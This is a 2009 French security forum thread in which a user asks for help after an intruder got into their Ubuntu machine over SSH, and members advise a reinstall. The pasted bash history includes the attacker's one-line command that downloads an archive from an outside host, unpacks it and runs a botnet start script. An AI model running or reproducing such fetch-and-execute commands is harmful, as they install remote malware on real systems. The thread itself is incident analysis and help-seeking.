logo Homepage
+  NewbieContest
|-+  Général» Defouloir» Qui connait tradelinux.info ?
Username:
Password:
Pages: [1]
  Imprimer  
Auteur Fil de discussion: Qui connait tradelinux.info ?  (Lu 2805 fois)
balicocat

Profil challenge

Classement : 21/53019

Néophyte
*
Hors ligne Hors ligne
Messages: 44


Voir le profil
« le: 12 Décembre 2009 à 12:29:57 »

hacking ou virus de mon ubuntu 9.04?

a l'origine un compte mal protegé et ssh distant (je sais j'ai trop confiance...) pas dans le sudoers (faut quand meme pas pousser)

Qui pourrait m'en dire plus ?


#cat /home/invite/.bash_history
passwd
w
ls
wget www.tradelinux.info/emech/nou.tgz;tar zxvf nou.tgz;cd tester;./start bum
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe

/* le type s'est connecté , a changer le mot de passe, téléchargé 2 archives et executé start

Si vous voulez je poste le nou.tgz qui contient plusieurs scripts
Et si vous etes interressé, je vous donne plus d'infos ce soir
A+
balicocat
Journalisée

Look out honey, 'cause i'm using technology
_o_
Relecteur

Profil challenge

Classement : 40/53019

Membre Héroïque
*
Hors ligne Hors ligne
Messages: 1258


Voir le profil
« #1 le: 12 Décembre 2009 à 13:58:20 »

Bonne nouvelle, tu héberges maintenant un joli serveur irc qui doit rentrer dans un botnet quelconque. Les scripts sont écrits avec les pieds, mais ça a l'air opérationnel. Pour ce qui est de l'histoire du SP Windows, tu n'es pas le seul à avoir rencontré ce genre de choses :
http://forums.debian.net/viewtopic.php?f=10&t=47486
http://forums.overclockers.com.au/showthread.php?t=805816

Maintenant, je ne veux pas être pessimiste, mais la machine étant compromise, je ne vois pas d'autre solution qu'un bon gros format et une réinstallation. Et si tu souhaites sauvegarder des données avant, t'as intérêt à contrôler de très près le contenu...
Journalisée

Les épreuves de hack de NC sont trop faciles ? Et pourtant ! Bienvenue dans la vraie vie : http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
the lsd
Administrateur

Profil challenge

Classement : 183/53019

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 3090

poulping for fun & profit


Voir le profil WWW
« #2 le: 12 Décembre 2009 à 14:17:07 »

Fais en une épreuve hack Forensic !

Enjoy

The lsd
Journalisée

Newbie Contest Staff :
The lsd - Th3_l5D (IRC)
Statut :
Administrateur
Citation :
Cartésien désabusé : je pense, donc je suis, mais je m'en fous !
balicocat

Profil challenge

Classement : 21/53019

Néophyte
*
Hors ligne Hors ligne
Messages: 44


Voir le profil
« #3 le: 12 Décembre 2009 à 18:32:02 »

mouais, j'y penserai !
Ceci dit, c'était une pénétration par ssh sur un seul compte (sans droits sudo)
j'ai désactivé ce compte, re-installé fail2ban (comme un con, je l'avais oublié après avoir changé le DD du PC et réinstalléé le système).
Je dois faire plus selon vous ? tout effacer et réinstaller ? Ces scripts peuvent-ils (à la maniere de virus) infecter d'autres fichiers (hors de son /home/). La désactivation de ce compte ne suffit-elle pas ?


Edit : J'oubliai : merci pour vos réponses (précedentes et à venir)
« Dernière édition: 12 Décembre 2009 à 18:51:05 par balicocat » Journalisée

Look out honey, 'cause i'm using technology
robert33
Beta testeur

Profil challenge

Classement : 35/53019

Néophyte
*
Hors ligne Hors ligne
Messages: 44


Voir le profil
« #4 le: 12 Décembre 2009 à 19:49:26 »

Normalement c'est bon, si ton noyau est à jour (pas d'exploit local) et que c'etait un user simple, (suffit de faire ls -l / et regarder les droits et vérifier les fichiers/dossiers), ton système ne devrait pas être corrompu.
« Dernière édition: 12 Décembre 2009 à 19:56:17 par robert33 » Journalisée
_o_
Relecteur

Profil challenge

Classement : 40/53019

Membre Héroïque
*
Hors ligne Hors ligne
Messages: 1258


Voir le profil
« #5 le: 13 Décembre 2009 à 00:00:27 »

Normalement c'est bon, si ton noyau est à jour (pas d'exploit local) et que c'etait un user simple, (suffit de faire ls -l / et regarder les droits et vérifier les fichiers/dossiers), ton système ne devrait pas être corrompu.

C'est une blague ? La machine est corrompue, tu n'as que cette certitude. Un noyau à jour ne protège pas d'un 0day.
Journalisée

Les épreuves de hack de NC sont trop faciles ? Et pourtant ! Bienvenue dans la vraie vie : http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
Pages: [1]
  Imprimer  
 
Aller à: